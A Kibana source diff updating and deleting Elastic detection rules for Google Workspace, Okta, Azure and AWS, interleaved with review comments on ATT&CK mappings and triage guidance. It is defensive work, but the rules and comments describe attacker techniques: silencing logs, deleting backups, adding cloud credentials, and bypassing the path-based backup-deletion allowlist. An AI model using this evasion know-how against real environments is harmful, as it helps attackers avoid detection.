@@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a custom admin role is deleted. An adversary may delete a custom admin role in order to impact the permissions or capabilities of system administrators.", - "false_positives": [ - "Google Workspace admin roles may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Google Workspace Admin Role Deletion", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:DELETE_ROLE\n", - "references": [ - "https://support.google.com/a/answer/2406043?hl=en" - ], - "risk_score": 47, - "rule_id": "93e63c3e-4154-4fc6-9f86-b411e0987bbf", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_mfa_enforcement_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_mfa_enforcement_disabled.json deleted file mode 100644 index f4cd48f2f7e86..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_mfa_enforcement_disabled.json +++ /dev/null 
@@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when multi-factor authentication (MFA) enforcement is disabled for Google Workspace users. An adversary may disable MFA enforcement in order to weaken an organization\u2019s security controls.", - "false_positives": [ - "MFA policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Google Workspace MFA Enforcement Disabled", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ENFORCE_STRONG_AUTHENTICATION and google_workspace.admin.new_value:false\n", - "references": [ - "https://support.google.com/a/answer/9176657?hl=en#" - ], - "risk_score": 47, - "rule_id": "cad4500a-abd7-4ef3-b5d3-95524de7cfe1", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 13 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_policy_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_policy_modified.json deleted file mode 100644 index 3876ce549fd6d..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_policy_modified.json +++ /dev/null 
@@ -1,34 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects when a Google Workspace password policy is modified. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", - "false_positives": [ - "Password policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-130m", - "index": [ - "filebeat-*", - "logs-google_workspace*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "Google Workspace Password Policy Modified", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", - "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and\n event.action:(CHANGE_APPLICATION_SETTING or CREATE_APPLICATION_SETTING) and\n google_workspace.admin.setting.name:(\n \"Password Management - Enforce strong password\" or\n \"Password Management - Password reset frequency\" or\n \"Password Management - Enable password reuse\" or\n \"Password Management - Enforce password policy at next login\" or\n \"Password Management - Minimum password length\" or\n \"Password Management - Maximum password length\"\n )\n", - "risk_score": 47, - "rule_id": "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73", - "severity": "medium", - "tags": [ - "Elastic", - "Cloud", - "Google Workspace", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 13 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json index ba55b3fc7a9bb..980b7118525d6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_attempt_to_revoke_okta_api_token.json 
@@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Revoke Okta API Token", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:system.api_token.revoke\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "676cff2b-450b-4cf1-8ed2-c0c58a4a2dd7", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json index 61903a15c0993..75193633e15ca 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_aws_eventbridge_rule_disabled_or_deleted.json 
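Review bot: Emptying `"note"` leaves this rule with no investigation guidance, while the AWS rules touched by the same commit receive full triage sections; the `setup` field only carries the data-source requirement. Revoking an Okta API token is also how an attacker silences the very log source this rule depends on (the Okta Fleet integration / Filebeat module named in `setup` pull the System Log with an API token), so the note should tell the analyst to first confirm that the revoked token is not the one used for log collection, since a gap in `okta.system` events after this alert is itself a strong signal. A minimal note would be a three-bullet "Possible investigation steps" list: identify the actor and the token's owner/purpose from the event, confirm the revocation with the Okta admins, and check whether log delivery from Okta continued after the event. Because the query has no `event.outcome` constraint, the note should also say that failed revocation attempts are in scope, which the "Attempt" in the rule name implies but the guidance should state explicitly.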
@@ -14,14 +14,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EventBridge Rule Disabled or Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:eventbridge.amazonaws.com and event.action:(DeleteRule or DisableRule) and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:eventbridge.amazonaws.com and event.action:(DeleteRule or DisableRule) and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/eventbridge/latest/APIReference/API_DeleteRule.html", "https://docs.aws.amazon.com/eventbridge/latest/APIReference/API_DisableRule.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "87594192-4539-4bc4-8543-23bc3d5bd2b4", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Impact" ], "threat": [ { @@ -39,10 +70,16 @@ "name": "Impact", "reference": "https://attack.mitre.org/tactics/TA0040/" }, - "technique": [] + "technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } 
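Review bot: The new ATT&CK mapping adds only T1489 Service Stop under Impact, but disabling or deleting an EventBridge rule is at least as often a defense-evasion step, since EventBridge rules are what route GuardDuty/Security Hub findings and CloudTrail-driven automation to responders; consider adding a second `threat` entry for Defense Evasion (TA0005) with T1562 Impair Defenses and the sub-technique T1562.008 "Disable or Modify Cloud Logs". The `"note"` field is emptied at the same time, so the analyst gets no hint to inspect the `Name` and `EventBusName` request parameters of the `DeleteRule`/`DisableRule` call and check whether the affected rule fed security tooling; a short "Possible investigation steps" note covering that would pair well with the new technique. The rule description lives outside the hunk, so whether it already frames this as evasion cannot be confirmed here.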
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_automation_runbook_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_automation_runbook_deleted.json deleted file mode 100644 index 83fd544c51f13..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_automation_runbook_deleted.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook that was used for persistence.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Runbook Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor", - "https://github.com/hausec/PowerZure", - "https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a", - "https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/" - ], - "risk_score": 21, - "rule_id": "8ddab73b-3d15-4e5d-9413-47f05553c1d7", - "severity": "low", - "tags": [ - "Elastic", - "Cloud", - "Azure", - "Continuous Monitoring", - "SecOps", - "Configuration Audit" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 5 -} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json index 486f7bb7ed06c..538d85a0ca83e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_azure_service_principal_credentials_added.json @@ -16,13 +16,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Service Principal Credentials Added", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Add service principal credentials\" and event.outcome:(success or Success)\n", "references": [ "https://www.fireeye.com/content/dam/collateral/en/wp-m-unc2452.pdf" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f766ffaf-9568-4909-b734-75d19b35cbf4", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
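Review bot: The `"note"` for this rule is reduced to an empty string, yet adding credentials to a service principal is the persistence technique described in the referenced UNC2452 report and deserves the same triage guidance the AWS rules in this commit received. Suggested investigation steps for the note: identify the initiating user and the target application/service principal from the audit event, determine whether a client secret or a certificate was added and its expiry, check whether the initiator is a registered owner of the application, and search subsequent sign-in logs for authentications by that service principal from new IP ranges. For response, the note should state that the remediation is to remove the unexpected credential from the service principal and review the application's granted permissions, not just to reset the initiating user's password. The file's `threat` array is outside the hunk, so whether it maps to T1098.001 Additional Cloud Credentials cannot be checked here.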
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json index e86276e86052d..6e3df25343448 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_backup_file_deletion.json 
@@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Third-party Backup Files Deleted via Unexpected Process", - "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. They allow the victim to resume business by performing\ndata recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the\nenvironment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete\nVeritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are\nnot from the backup suite. 
Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Third-party Backup Files Deleted via Unexpected Process\n\nBackups are a significant obstacle for any ransomware operation. 
They allow the victim to resume business by performing\ndata recovery, making them a valuable target.\n\nAttackers can delete backups from the host and gain access to backup servers to remove centralized backups for the\nenvironment, ensuring that victims have no alternatives to paying the ransom.\n\nThis rule identifies file deletions performed by a process that does not belong to the backup suite and aims to delete\nVeritas or Veeam backups.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This rule can be triggered by the manual removal of backup files and by removal using other third-party tools that are\nnot from the backup suite. Exceptions can be added for specific accounts and executables, preferably tied together.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Perform data recovery locally or restore the backups from replicated copies (Cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type == \"deletion\" and\n (\n /* Veeam Related Backup Files */\n (file.extension : (\"VBK\", \"VIB\", \"VBM\") and\n not process.executable : (\"?:\\\\Windows\\\\Veeam\\\\Backup\\\\*\",\n \"?:\\\\Program Files\\\\Veeam\\\\Backup and Replication\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veeam\\\\Backup and Replication\\\\*\")) or\n\n /* Veritas Backup Exec Related Backup File */\n (file.extension : \"BKF\" and\n not process.executable : (\"?:\\\\Program Files\\\\Veritas\\\\Backup Exec\\\\*\",\n \"?:\\\\Program Files (x86)\\\\Veritas\\\\Backup Exec\\\\*\"))\n )\n", "references": [ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "11ea6bec-ebde-4d71-a8e9-784948f8e3e9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you 
will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json index 196f54bfc174d..c532b8ce462f6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudtrail_logging_updated.json 
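Review bot: The new `required_fields` array omits `event.category`, although the EQL query's `file where …` clause is a constraint on `event.category == "file"`, so the list understates what a compatible data source must provide; add `{ "ecs": true, "name": "event.category", "type": "keyword" }` alongside `event.type`, matching how the KQL rules in this commit enumerate every field their query touches. Separately, the detection's allowlist is purely path-based (`process.executable` under the Veeam/Veritas install directories); an actor with the privileges needed to delete backups can usually also stage a binary in those directories, so consider tightening the exclusion with a code-signature condition (for example also requiring the Veeam/Veritas signer) and mentioning this bypass in the false-positive section. The query itself is unchanged context in this hunk.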
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Updated", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Updated\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your\nAmazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to\nactions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services\naccount activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and\nother Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and\ntroubleshooting.\n\nThis rule identifies a modification on CloudTrail settings using the API `UpdateTrail` action. 
Attackers can do this to\ncover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the response elements of the event to determine the scope of the changes.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the 
impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:UpdateTrail and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_UpdateTrail.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "3e002465-876f-4f04-b016-84ef48ce7e5d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -73,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json index 9ad5f631ad307..4886517dde5e0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_cloudwatch_log_group_deletion.json 
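Review bot: The new triage note tells the analyst to "Examine the response elements of the event to determine the scope of the changes", but for `UpdateTrail` the security-relevant content is in the request parameters, not the response: whether `IsMultiRegionTrail` or `IncludeGlobalServiceEvents` was turned off, whether `S3BucketName`, `SnsTopicName` or `CloudWatchLogsLogGroupArn` was pointed at an attacker-controlled or non-existent destination, and whether `EnableLogFileValidation` or `KmsKeyId` was removed (all fields of the referenced API_UpdateTrail document). Suggested replacement bullet: `- Examine the request parameters of the UpdateTrail event: changes to IsMultiRegionTrail, IncludeGlobalServiceEvents, S3BucketName, CloudWatchLogsLogGroupArn, EnableLogFileValidation or KmsKeyId reduce or redirect logging coverage.` The note could also add a response step to re-enable multi-region/global-event logging and log file validation once the change is confirmed malicious.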
@@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudWatch Log Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Log Group Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nA log group is a group of log streams that share the same retention, monitoring, and access control settings. You can\ndefine log groups and specify which streams to put into each group. There is no limit on the number of log streams that\ncan belong to one log group.\n\nThis rule looks for the deletion of a log group using the API `DeleteLogGroup` action. 
Attackers can do this to cover\ntheir tracks and impact security monitoring that relies on these sources.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log group's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team 
